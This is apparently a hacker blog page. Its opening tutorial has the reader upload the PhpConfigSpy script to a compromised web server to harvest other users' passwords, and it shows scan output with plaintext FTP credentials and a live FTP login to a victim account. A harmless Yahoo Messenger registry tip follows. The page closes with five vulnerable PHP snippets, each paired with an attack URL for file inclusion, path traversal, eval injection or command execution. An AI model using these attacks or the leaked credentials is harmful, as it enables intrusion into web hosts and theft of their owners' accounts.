PhpConfigSpy is one tool that is great to get some Account in the website like cpanel login, ssh login (if web target supported ssh) and maybe database login.
Most of us, after getting a web target (Via inject PHP) we will use that web only for BOT (EGGDROP, PSYBNC). Why we do not try to get full access to the Web target.
Let’s we try to get some information login from web target with PhpConfigSpy tool.
Upload PhpConfigSpy.txt into web target, and after that rename this file from .txt become .php. It’s finish, that’s all. You can test that tool using browser (IE, Firefox, Opera, etc). For Example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of scaning :

[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success

Binggo… That is success !!!
You can check that username via FTP or SSH (if target supported SSH)
Let we check together for this login
[FTP] bsidenet:bside123 Success
That’s mean user : bsidenet and password : bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r–r– 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r–r– 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r–r– 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r–r– 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx—— 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw——- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x— 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x— 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>

It’s Work Bro

Yahoo Messenger (YM) is one of the most used to chat. Beside YM, people maybe used MSN, ICQ, Skype etc. Here i will give some tutorial how to login more than one account YM in 1 computer (just for Yahoo! Messenger).
Let’s Begin

1. Run registry editor. Start Menu -> Run, then type regedit and press enter.
2. Find this folder in the left of registry menu HKEY_CURRENT_USERSoftwareYahooPagerTest
3. In the right panel, right click mouse and choose New – Dword Value
4. Type Plural
5. Double click that Plural and filled it with 1

It’s finished all . You can sign in with 2 Yahoo account in 1 computer.

======case 1======
[scripts]
$page = $_GET[page];
include($page);
[attack]
http://victim.com/file.php?page=[evil scripts]

======case 2======
[Scripts]
Header( “Content-Type: Application/Octet-Stream” );
header( “Content-Length: ” . filesize($_GET['file'] ) );
header( “Content-Disposition: inline; filename=\”$_GET[file]\”");
readfile($_GET['file'] );
[attack]

http://victim.com/file.php?file=index.php

=======case 3=======
[scripts]
$fp = fopen(“/path/{$_GET['filename']}.txt”, ‘r’);
[attack]

http://victim.com/file.php?filename=../../../etc/passwd

======case 4======
[scripts]
eval($_GET[ev]);
[attack]
http://victim.com/file.php?ev=include($_GET[vegetoo]);&vegetoo=[evil code]

==========case 5==========
[scripts]
passthru($_GET[cmd]);
[attack]
http://victim.com/file.php?cmd=ls -al